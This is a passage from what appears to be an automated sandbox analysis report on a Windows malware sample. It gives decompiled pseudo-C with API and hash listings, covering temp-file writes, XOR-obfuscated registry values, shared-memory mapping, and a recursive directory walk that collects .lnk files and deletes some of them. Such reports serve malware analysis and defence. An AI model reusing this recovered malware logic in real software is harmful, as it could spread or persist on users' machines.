                                						if( *((intOrPtr*)(0x22197f0 + _v8 * 4)) != 0) {
                                							_t16 = _v8;
                                							_t22 =  *(0x22197f0 + _t16 * 4);
                                							if(WaitForSingleObject( *(0x22197f0 + _t16 * 4), 0x64) == 0) {
                                								E022041C6(_t22, 0, _v8, 1);
                                								_t25 = _t25 + 0xc;
                                							}
                                						}
                                						_v8 = _v8 + 1;
                                					}
                                					Sleep(0x4e20); // executed
                                				}
                                				_push(0);
                                				RtlExitUserThread();
                                				return 0;
                                			}






                                0x0220426e
                                0x02204275
                                0x0220427e
                                0x02204290
                                0x022042a4
                                0x022042a8
                                0x022042ab
                                0x022042bb
                                0x022042c5
                                0x022042ca
                                0x022042ca
                                0x022042bb
                                0x0220428d
                                0x0220428d
                                0x022042d4
                                0x022042d4
                                0x022042dc
                                0x022042de
                                0x022042e9

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000064), ref: 022042B3
                                • Sleep.KERNELBASE(00004E20), ref: 022042D4
                                • RtlExitUserThread.NTDLL(00000000), ref: 022042DE
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: ExitObjectSingleSleepThreadUserWait
                                • String ID:
                                • API String ID: 295063474-0
                                • Opcode ID: 74e76b8289042f7ba3c5025bb7347e5a3f7a95c30d8d94024586ad6288e1a658
                                • Instruction ID: ff881047867b3ec4147c7803ce02cd58493ac9bc909a0361a39a834a26f9613c
                                • Opcode Fuzzy Hash: 74e76b8289042f7ba3c5025bb7347e5a3f7a95c30d8d94024586ad6288e1a658
                                • Instruction Fuzzy Hash: 37017C70A60208EFEB00EFE0ED84BAA73B5AB08704F108558E6056A2C5D7B29E90DB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02212FFF(void* __eflags, CHAR* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void* _t11;
                                				int _t14;
                                
                                				_v8 = 0;
                                				E0220A75A(_a4);
                                				_t11 = CreateFileA(_a4, 0x40000000, 2, 0, "true", 0x20, 0); // executed
                                				_v12 = _t11;
                                				if(_v12 != 0xffffffff) {
                                					WriteFile(_v12, 0x21e26b0, 0x401,  &_v8, 0); // executed
                                					_t14 = FindCloseChangeNotification(_v12); // executed
                                					return _t14;
                                				}
                                				return _t11;
                                			}







                                0x02213005
                                0x02213010
                                0x0221302b
                                0x02213031
                                0x02213038
                                0x0221304e
                                0x02213058
                                0x00000000
                                0x02213058
                                0x02213061

                                APIs
                                  • Part of subcall function 0220A75A: GetTempPathA.KERNEL32(00000080,02213015,?), ref: 0220A78C
                                  • Part of subcall function 0220A75A: lstrlen.KERNEL32(02213015), ref: 0220A796
                                  • Part of subcall function 0220A75A: lstrcat.KERNEL32(02213015,02203CC0), ref: 0220A7B2
                                  • Part of subcall function 0220A75A: lstrcpy.KERNEL32(00000000,00000000), ref: 0220A7CF
                                  • Part of subcall function 0220A75A: lstrlen.KERNEL32(02213015,02202880,00000000), ref: 0220A7FD
                                  • Part of subcall function 0220A75A: wsprintfA.USER32 ref: 0220A809
                                • CreateFileA.KERNELBASE(0221382E,40000000,00000002,00000000,?,00000020,00000000,?,0221382E), ref: 0221302B
                                • WriteFile.KERNELBASE(000000FF,021E26B0,00000401,00000000,00000000), ref: 0221304E
                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 02213058
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Filelstrlen$ChangeCloseCreateFindNotificationPathTempWritelstrcatlstrcpywsprintf
                                • String ID:
                                • API String ID: 143672941-0
                                • Opcode ID: f37b9fa1b152d13b737d204d4c457ebdbae42c211bdfd46ea4ebd84993cf38d9
                                • Instruction ID: 532a68dcfcd238f9727b2fdf257edfca04a5e7a4bb4de4e415f956920e16d74f
                                • Opcode Fuzzy Hash: f37b9fa1b152d13b737d204d4c457ebdbae42c211bdfd46ea4ebd84993cf38d9
                                • Instruction Fuzzy Hash: 4EF036B5A90308FBEB10DFF0DC4EF9E7B799744714F504654FB056A2C0D6B159948790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E022108CE() {
                                				signed int _t11;
                                				void* _t20;
                                
                                				 *((intOrPtr*)(_t20 - 4)) = 0xffffffff;
                                				if( *(_t20 - 0x1c) != 0) {
                                					GlobalFree( *(_t20 - 0x1c));
                                					 *(_t20 - 0x1c) = 0;
                                				}
                                				 *0x21e1180(0x2219018);
                                				if(( *(_t20 - 0x1640) & 0x000000ff) != 0) {
                                					Sleep(0x400); // executed
                                				}
                                				_t11 =  *(_t20 - 0x1640) & 0x000000ff;
                                				 *[fs:0x0] =  *((intOrPtr*)(_t20 - 0x10));
                                				return _t11;
                                			}





                                0x022108d1
                                0x022108dc
                                0x022108e2
                                0x022108e8
                                0x022108e8
                                0x022108f4
                                0x02210908
                                0x0221090f
                                0x0221090f
                                0x0221091b
                                0x02210923
                                0x02210930

                                APIs
                                • GlobalFree.KERNEL32(00000000), ref: 022108E2
                                • RtlLeaveCriticalSection.NTDLL(02219018), ref: 022108F4
                                • Sleep.KERNELBASE(00000400), ref: 0221090F
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CriticalFreeGlobalLeaveSectionSleep
                                • String ID:
                                • API String ID: 2599486065-0
                                • Opcode ID: 4af7cb2282f16a473e17020900caa10a761511c28be47564fb798e582016d2e2
                                • Instruction ID: acaa0307c8b93fb95dfaf8bd5a665e30d62aa451c825465eb5a8260dcf02c859
                                • Opcode Fuzzy Hash: 4af7cb2282f16a473e17020900caa10a761511c28be47564fb798e582016d2e2
                                • Instruction Fuzzy Hash: DAF03A76E4020ADBEF249FD4D8097AEB7B0FB04315F044569ED15A6680D7391A91CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0220C89A(intOrPtr _a4) {
                                				void* _v8;
                                				long _v12;
                                				void* _t11;
                                				void* _t12;
                                
                                				_v8 = 0;
                                				_v12 = 0;
                                				if( *0x22882c0 != 0 &&  *0x22882c0 != 0xffffffff) {
                                					_t11 =  *0x22882c0; // 0x264
                                					_t12 = MapViewOfFile(_t11, 6, 0, 0, 0x15400); // executed
                                					_v8 = _t12;
                                					if(_v8 != 0) {
                                						E0221772B(_a4, _v8, 0x10000);
                                						_v12 = 1;
                                						UnmapViewOfFile(_v8);
                                					}
                                				}
                                				return _v12;
                                			}







                                0x0220c8a0
                                0x0220c8a7
                                0x0220c8b5
                                0x0220c8cb
                                0x0220c8d1
                                0x0220c8d7
                                0x0220c8de
                                0x0220c8ed
                                0x0220c8f5
                                0x0220c900
                                0x0220c900
                                0x0220c8de
                                0x0220c90c

                                APIs
                                • MapViewOfFile.KERNELBASE(00000264,00000006,00000000,00000000,00015400), ref: 0220C8D1
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0220C900
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: FileView$Unmap
                                • String ID:
                                • API String ID: 3282598733-0
                                • Opcode ID: 9dff7a2c07c597ada910e0c53630cb2004b889f18b9bf8148cb875a4675a5670
                                • Instruction ID: bb5bdea3c01375d2e88dd086b510d4a7cacf53f7ec787534edcccb7ffae80546
                                • Opcode Fuzzy Hash: 9dff7a2c07c597ada910e0c53630cb2004b889f18b9bf8148cb875a4675a5670
                                • Instruction Fuzzy Hash: 4CF04674D40208EBDB20DBD4EC49BAD77B4AB04329F204645FA046B2C8D3B55AA48B45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02206274() {
                                				CHAR* _t1;
                                				void* _t2;
                                				void* _t3;
                                				void* _t4;
                                
                                				 *0x2219008 = 0;
                                				 *0x2219074 = 0;
                                				 *0x2219068 = 0;
                                				_t1 =  *0x21e1688; // 0x2202104
                                				_t2 = CreateFileMappingA(0xffffffff, 0, "true", 0, 0x8000, _t1); // executed
                                				 *0x2219008 = _t2;
                                				if( *0x2219008 != 0) {
                                					_t4 =  *0x2219008; // 0x268
                                					_t3 = MapViewOfFile(_t4, 6, 0, 0, 0x8000); // executed
                                					 *0x2219074 = _t3;
                                					return _t3;
                                				}
                                				return _t2;
                                			}







                                0x02206277
                                0x02206281
                                0x0220628b
                                0x02206295
                                0x022062a8
                                0x022062ae
                                0x022062ba
                                0x022062c7
                                0x022062ce
                                0x022062d4
                                0x00000000
                                0x022062d4
                                0x022062da

                                APIs
                                • CreateFileMappingA.KERNEL32(000000FF,00000000,?,00000000,00008000,02202104), ref: 022062A8
                                • MapViewOfFile.KERNELBASE(00000268,00000006,00000000,00000000,00008000), ref: 022062CE
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$CreateMappingView
                                • String ID:
                                • API String ID: 3452162329-0
                                • Opcode ID: a0f714920739a6a8de1203365898e56a8c5e32d667c97926f76a69c9259d09ac
                                • Instruction ID: 4439f56d21504347955ec1fec98442a0f08c32a290f947e8132369fe52325096
                                • Opcode Fuzzy Hash: a0f714920739a6a8de1203365898e56a8c5e32d667c97926f76a69c9259d09ac
                                • Instruction Fuzzy Hash: 2DF0ACB4AC0300ABE7248BD4FC6DF5237A8B314B54F244905FA196A2C0CBB625E8CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 82%
                                			E022058E9() {
                                				long _t46;
                                				signed int _t50;
                                				char _t67;
                                				void* _t75;
                                				void* _t77;
                                
                                				L0:
                                				while(1) {
                                					L0:
                                					 *(_t75 - 0x228) =  *(_t75 - 0x228) + 1;
                                					_t46 =  *(_t75 - 4) + 0x14;
                                					 *(_t75 - 4) = _t46;
                                					if( *(_t75 - 0x228) >= 0x3e8) {
                                						break;
                                					}
                                					L2:
                                					 *(_t75 - 0x224) =  *(_t75 - 4);
                                					if( *( *(_t75 - 0x224)) != 0) {
                                						L3:
                                						_t46 =  *(_t75 - 0x224);
                                						if(0 != 0) {
                                							L5:
                                							 *(_t75 - 0x22c) = 1;
                                							L7:
                                							while( *(_t75 - 0x22c) < 5) {
                                								_t67 = "alfoC:\\Windows\\"; // 0x6f666c61
                                								wsprintfA(_t75 - 0x10c, "%c%d_%d", _t67,  *(_t75 - 0x22c),  *(_t75 - 0x228));
                                								_t77 = _t77 + 0x14;
                                								 *(_t75 - 0x234) =  *(_t75 - 0x22c);
                                								 *(_t75 - 0x234) =  *(_t75 - 0x234) - 1;
                                								if( *(_t75 - 0x234) <= 3) {
                                									L9:
                                									switch( *((intOrPtr*)( *(_t75 - 0x234) * 4 +  &M02205C06))) {
                                										case 0:
                                											L10:
                                											 *(_t75 - 0x218) =  *( *(_t75 - 0x224));
                                											goto L14;
                                										case 1:
                                											L11:
                                											 *((intOrPtr*)(__ebp - 0x218)) = 0;
                                											goto L14;
                                										case 2:
                                											L12:
                                											 *((intOrPtr*)(__ebp - 0x218)) =  *((intOrPtr*)( *((intOrPtr*)(__ebp - 0x224)) + 8));
                                											goto L14;
                                										case 3:
                                											L13:
                                											 *((intOrPtr*)(__ebp - 0x218)) =  *((intOrPtr*)( *((intOrPtr*)(__ebp - 0x224)) + 0xc));
                                											goto L14;
                                									}
                                								}
                                								L14:
                                								_t50 = "alfoC:\\Windows\\"; // 0x6f666c61
                                								 *(_t75 - 0x218) =  *(_t75 - 0x218) ^ _t50 *  *(_t75 - 0x228);
                                								_t46 = RegSetValueExA( *(_t75 - 0x230), _t75 - 0x10c, 0, "true", _t75 - 0x218, "true"); // executed
                                								L6:
                                								 *(_t75 - 0x22c) =  *(_t75 - 0x22c) + 1;
                                							}
                                							continue;
                                						} else {
                                							goto L4;
                                						}
                                					}
                                					break;
                                				}
                                				L16:
                                				if( *(_t75 - 0x230) != 0) {
                                					_t46 = RegCloseKey( *(_t75 - 0x230)); // executed
                                				}
                                				return _t46;
                                			}








                                0x022058e9
                                0x022058e9
                                0x022058e9
                                0x022058f2
                                0x022058fb
                                0x022058fe
                                0x0220590b
                                0x00000000
                                0x00000000
                                0x02205911
                                0x02205914
                                0x02205923
                                0x02205925
                                0x02205925
                                0x02205933
                                0x0220593a
                                0x0220593a
                                0x00000000
                                0x02205955
                                0x02205970
                                0x02205983
                                0x02205989
                                0x02205992
                                0x022059a1
                                0x022059ae
                                0x022059b0
                                0x022059b6
                                0x00000000
                                0x022059bd
                                0x022059c5
                                0x00000000
                                0x00000000
                                0x022059cd
                                0x022059d9
                                0x00000000
                                0x00000000
                                0x022059e1
                                0x022059ea
                                0x00000000
                                0x00000000
                                0x022059f2
                                0x022059fb
                                0x00000000
                                0x00000000
                                0x022059b6
                                0x02205a01
                                0x02205a01
                                0x02205a15
                                0x02205a36
                                0x02205946
                                0x0220594f
                                0x0220594f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02205933
                                0x00000000
                                0x02205923
                                0x02205a46
                                0x02205bf2
                                0x02205bfb
                                0x02205bfb
                                0x02205c05

                                APIs
                                • wsprintfA.USER32 ref: 02205983
                                • wsprintfA.USER32 ref: 02205AF0
                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 02205B2D
                                • RegCloseKey.KERNELBASE(00000000), ref: 02205BFB
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: wsprintf$CloseQueryValue
                                • String ID:
                                • API String ID: 2158237808-0
                                • Opcode ID: 60db19961b5345d8dd2d5172db7c0dde117cdc4f5ca5b26c79320930f0361c52
                                • Instruction ID: 58558d8c51561aaba37ef8631b26bc8664a7c474d09a9273a0d86198a2268f4c
                                • Opcode Fuzzy Hash: 60db19961b5345d8dd2d5172db7c0dde117cdc4f5ca5b26c79320930f0361c52
                                • Instruction Fuzzy Hash: 21F0E730A11119DBCB24DFC8E9C87A9B3B1BF48319F5441D9D409A7296C7749E90CE44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • KiUserExceptionDispatcher.NTDLL(?,00426F68), ref: 00426FC6
                                Memory Dump Source
                                • Source File: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: DispatcherExceptionUser
                                • String ID:
                                • API String ID: 6842923-0
                                • Opcode ID: c8f7c87faae4f4379b3fccb25882370ad6c9884bf352f412aa7a75093acdeb8a
                                • Instruction ID: fb32c6be49da612cac96d1c3c57b222d11916e19f30649eebda2ab01775f0cbc
                                • Opcode Fuzzy Hash: c8f7c87faae4f4379b3fccb25882370ad6c9884bf352f412aa7a75093acdeb8a
                                • Instruction Fuzzy Hash: C1D0A7703002044FDF548F348608438BAE4EF49310B52057CE4C5DB361E774DC40DB05
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                C-Code - Quality: 40%
                                			E02211060(intOrPtr _a4, CHAR* _a8, signed int _a12, struct _WIN32_FIND_DATAA* _a16, signed int _a20, signed int _a24) {
                                				signed int _v8;
                                				intOrPtr _v20;
                                				intOrPtr _v28;
                                				signed int _v32;
                                				void* _v36;
                                				signed int _v40;
                                				signed int _v44;
                                				signed int _v48;
                                				intOrPtr _v52;
                                				void* _t117;
                                				signed int _t121;
                                				signed int _t127;
                                				void* _t129;
                                				void* _t134;
                                				signed int _t145;
                                				signed int _t147;
                                				signed int _t152;
                                				signed int _t153;
                                				signed int _t156;
                                				signed int _t157;
                                				signed int _t162;
                                				signed int _t163;
                                				intOrPtr _t164;
                                				signed int _t165;
                                				signed int _t170;
                                				signed int _t174;
                                				long _t181;
                                				struct _WIN32_FIND_DATAA* _t193;
                                				struct _WIN32_FIND_DATAA* _t205;
                                				signed int _t218;
                                				signed int _t227;
                                				signed int _t237;
                                				struct _WIN32_FIND_DATAA* _t238;
                                				intOrPtr _t250;
                                				signed int _t262;
                                				signed int _t265;
                                				intOrPtr _t268;
                                				intOrPtr _t273;
                                				intOrPtr _t274;
                                				void* _t275;
                                
                                				_push(0xffffffff);
                                				_push(0x2203fe8);
                                				_push(0x2218090);
                                				_push( *[fs:0x0]);
                                				 *[fs:0x0] = _t273;
                                				_t274 = _t273 + 0xffffffe0;
                                				_v28 = _t274;
                                				_v48 = 0;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v44 = 0;
                                				_v8 = 0;
                                				asm("sbb eax, eax");
                                				Sleep(( ~(_a12 & 0x000000ff) & 0x00000800) + 0x800);
                                				if( *((char*)( &(_a8[_a4]) - 1)) != 0x5c) {
                                					 *0x21e106c(_a8, 0x2203d20);
                                					_a4 = _a4 + 1;
                                				}
                                				_t117 = E02208DEB(_a8,  &M022194E4);
                                				_t275 = _t274 + 8;
                                				if(_t117 == 0) {
                                					 *0x21e106c(_a8, 0x2203d24);
                                					_v36 = FindFirstFileA(_a8, _a16);
                                					__eflags = _v36 - 0xffffffff;
                                					if(_v36 == 0xffffffff) {
                                						L41:
                                						__eflags = _a12 & 0x000000ff;
                                						if((_a12 & 0x000000ff) != 0) {
                                							__eflags =  *_a20;
                                							if( *_a20 != 0) {
                                								__eflags = _v44;
                                								if(_v44 == 0) {
                                									__eflags = _a24;
                                									if(_a24 == 0) {
                                										_t237 =  &(_a8[_a4]);
                                										__eflags = _t237;
                                										 *_t237 = 0;
                                										E02210E71(_a8, _t237, _a8, _a20);
                                										 *0x22194dc = 1;
                                									}
                                								}
                                							}
                                						}
                                						_v8 = 0xffffffff;
                                						__eflags = _v36;
                                						if(_v36 != 0) {
                                							FindClose(_v36);
                                						}
                                						Sleep(0x400);
                                						_t121 = 0;
                                						__eflags = 0;
                                						goto L50;
                                					} else {
                                						goto L5;
                                					}
                                					while(1) {
                                						L5:
                                						_t127 = FindNextFileA(_v36, _a16);
                                						__eflags = _t127;
                                						if(_t127 == 0) {
                                							goto L41;
                                						}
                                						_t238 = _a16;
                                						__eflags = _t238->cFileName - 0x2e;
                                						if(_t238->cFileName != 0x2e) {
                                							_t193 = _a16;
                                							__eflags = _t193->cFileName;
                                							if(_t193->cFileName != 0) {
                                								__eflags = _v40 - 0x64;
                                								if(_v40 > 0x64) {
                                									_v40 = 0;
                                									asm("sbb eax, eax");
                                									_t181 = ( ~(_a12 & 0x000000ff) & 0x00000800) + 0x800;
                                									__eflags = _t181;
                                									Sleep(_t181);
                                								}
                                								_t129 =  *0x21e114c( &(_a16->cFileName));
                                								__eflags = _a4 + _t129 - 0xfa;
                                								if(_a4 + _t129 <= 0xfa) {
                                									_a8[_a4] = 0;
                                									 *0x21e106c(_a8,  &(_a16->cFileName));
                                									_v32 =  *0x21e114c(_a8) - 4;
                                									_t134 =  *0x21e114c( &(_a16->cFileName));
                                									__eflags = _t134 - 4;
                                									if(_t134 <= 4) {
                                										L24:
                                										__eflags = _a12 & 0x000000ff;
                                										if((_a12 & 0x000000ff) != 0) {
                                											__eflags =  *_a20;
                                											if( *_a20 != 0) {
                                												__eflags =  *0x2287d90 - 0xc7;
                                												if( *0x2287d90 < 0xc7) {
                                													_t156 = E02208DEB( &(_a16->cFileName), ".tmp");
                                													_t275 = _t275 + 8;
                                													__eflags = _t156;
                                													if(_t156 == 0) {
                                														_t157 = E02208DEB( &(_a16->cFileName), ".lnk");
                                														_t275 = _t275 + 8;
                                														__eflags = _t157;
                                														if(_t157 == 0) {
                                															_t218 =  *0x2287d90; // 0x0
                                															 *0x21e1148(0x227b270 + _t218 * 0x104,  &(_a16->cFileName));
                                															_t262 =  *0x2287d90; // 0x0
                                															 *0x21e106c(0x227b270 + _t262 * 0x104, ".lnk");
                                															_t162 =  *0x2287d90; // 0x0
                                															_t163 = _t162 + 1;
                                															__eflags = _t163;
                                															 *0x2287d90 = _t163;
                                														}
                                													}
                                												}
                                												_t152 = E02208DEB( &(_a16->cFileName), ".lnk");
                                												_t275 = _t275 + 8;
                                												__eflags = _t152;
                                												if(_t152 != 0) {
                                													_t153 = E02210CF6(_a8);
                                													_t275 = _t275 + 4;
                                													_v32 = _t153;
                                													__eflags = _v32 - 1;
                                													if(_v32 == 1) {
                                														DeleteFileA(_a8);
                                													}
                                													__eflags = _v32 - 2;
                                													if(_v32 == 2) {
                                														_v44 = 1;
                                													}
                                												}
                                											}
                                										}
                                										_a8[_a4] = 0;
                                										__eflags = _a16->dwFileAttributes & 0x00000010;
                                										if((_a16->dwFileAttributes & 0x00000010) != 0) {
                                											_t205 = _a16;
                                											__eflags = _t205->cFileName - 0x2e;
                                											if(_t205->cFileName != 0x2e) {
                                												 *0x21e1148( &(_a8[_a4]),  &(_a16->cFileName));
                                												_v48 =  *0x21e114c( &(_a16->cFileName));
                                												_a4 = _a4 + (_v48 & 0x0000ffff);
                                												_t250 =  *0x21e178c; // 0x220260c
                                												_t145 =  *0x21e10b0( &(_a16->cFileName), _t250);
                                												__eflags = _t145;
                                												if(_t145 != 0) {
                                													asm("sbb edx, edx");
                                													__eflags =  ~(_a12 & 0x000000ff) & _a20;
                                													E02211060(_a4, _a8, _a12, _a16,  ~(_a12 & 0x000000ff) & _a20, _a24);
                                													_t275 = _t275 + 0x18;
                                												}
                                												_a4 = _a4 - (_v48 & 0x0000ffff);
                                												_t147 =  &(_a8[_a4]);
                                												__eflags = _t147;
                                												 *_t147 = 0;
                                											}
                                										}
                                										_v40 = _v40 + 1;
                                										continue;
                                									}
                                									_t164 =  *0x21e17fc; // 0x22026f0
                                									_t165 =  *0x21e10b0( &(_a8[_v32]), _t164);
                                									__eflags = _t165;
                                									if(_t165 == 0) {
                                										L17:
                                										_v32 = 0;
                                										while(1) {
                                											_t265 = _v32;
                                											_t223 =  *((char*)( *((intOrPtr*)(0x21e1c50 + _t265 * 4))));
                                											__eflags =  *((char*)( *((intOrPtr*)(0x21e1c50 + _t265 * 4))));
                                											if(__eflags == 0) {
                                												break;
                                											}
                                											_t170 = E02208DEB( &(_a16->cFileName),  *((intOrPtr*)(0x21e1c50 + _v32 * 4)));
                                											_t275 = _t275 + 8;
                                											__eflags = _t170;
                                											if(_t170 != 0) {
                                												E0220A26E(_a8, 0);
                                												_t275 = _t275 + 8;
                                											}
                                											_t227 = _v32 + 1;
                                											__eflags = _t227;
                                											_v32 = _t227;
                                										}
                                										E0220E329(_t223, __eflags, _a8, 0, 0);
                                										_t275 = _t275 + 0xc;
                                										goto L24;
                                									}
                                									_t268 =  *0x21e1800; // 0x22026f8
                                									_t174 =  *0x21e10b0( &(_a8[_v32]), _t268);
                                									__eflags = _t174;
                                									if(_t174 != 0) {
                                										goto L24;
                                									}
                                									goto L17;
                                								}
                                								_v40 = _v40 + 1;
                                								continue;
                                							} else {
                                								goto L41;
                                							}
                                						} else {
                                							continue;
                                						}
                                					}
                                					goto L41;
                                				} else {
                                					_v52 = 0;
                                					_v8 = 0xffffffff;
                                					_t121 = _v52;
                                					L50:
                                					 *[fs:0x0] = _v20;
                                					return _t121;
                                				}
                                			}











































                                0x02211063
                                0x02211065
                                0x0221106a
                                0x02211075
                                0x02211076
                                0x0221107d
                                0x02211083
                                0x02211086
                                0x0221108c
                                0x02211093
                                0x0221109a
                                0x022110a1
                                0x022110b2
                                0x022110bf
                                0x022110d2
                                0x022110dd
                                0x022110e9
                                0x022110e9
                                0x022110f5
                                0x022110fa
                                0x022110ff
                                0x02211120
                                0x02211134
                                0x02211137
                                0x0221113b
                                0x0221144c
                                0x02211455
                                0x02211457
                                0x0221145f
                                0x02211461
                                0x02211463
                                0x02211467
                                0x02211469
                                0x0221146d
                                0x02211472
                                0x02211472
                                0x02211475
                                0x02211480
                                0x02211488
                                0x02211488
                                0x0221146d
                                0x02211467
                                0x02211461
                                0x02211492
                                0x022114ab
                                0x022114af
                                0x022114b5
                                0x022114b5
                                0x022114c0
                                0x022114c6
                                0x022114c6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02211141
                                0x02211141
                                0x02211149
                                0x0221114f
                                0x02211151
                                0x00000000
                                0x00000000
                                0x02211157
                                0x0221115e
                                0x02211161
                                0x02211165
                                0x0221116c
                                0x0221116e
                                0x02211175
                                0x02211179
                                0x0221117b
                                0x0221118c
                                0x02211193
                                0x02211193
                                0x02211199
                                0x02211199
                                0x022111a6
                                0x022111b1
                                0x022111b7
                                0x022111cd
                                0x022111db
                                0x022111ee
                                0x022111f8
                                0x022111fe
                                0x02211201
                                0x02211297
                                0x022112a0
                                0x022112a2
                                0x022112ae
                                0x022112b0
                                0x022112b6
                                0x022112c0
                                0x022112ce
                                0x022112d3
                                0x022112d6
                                0x022112d8
                                0x022112e6
                                0x022112eb
                                0x022112ee
                                0x022112f0
                                0x022112f9
                                0x0221130c
                                0x02211317
                                0x0221132a
                                0x02211330
                                0x02211335
                                0x02211335
                                0x02211338
                                0x02211338
                                0x022112f0
                                0x022112d8
                                0x02211349
                                0x0221134e
                                0x02211351
                                0x02211353
                                0x02211359
                                0x0221135e
                                0x02211361
                                0x02211364
                                0x02211368
                                0x0221136e
                                0x0221136e
                                0x02211374
                                0x02211378
                                0x0221137a
                                0x0221137a
                                0x02211378
                                0x02211353
                                0x022112b0
                                0x02211387
                                0x02211392
                                0x02211394
                                0x0221139a
                                0x022113a1
                                0x022113a4
                                0x022113b8
                                0x022113cb
                                0x022113dc
                                0x022113df
                                0x022113ed
                                0x022113f3
                                0x022113f5
                                0x02211406
                                0x02211408
                                0x0221141c
                                0x02211421
                                0x02211421
                                0x02211432
                                0x02211438
                                0x02211438
                                0x0221143b
                                0x0221143b
                                0x022113a4
                                0x02211444
                                0x00000000
                                0x02211444
                                0x02211207
                                0x02211214
                                0x0221121a
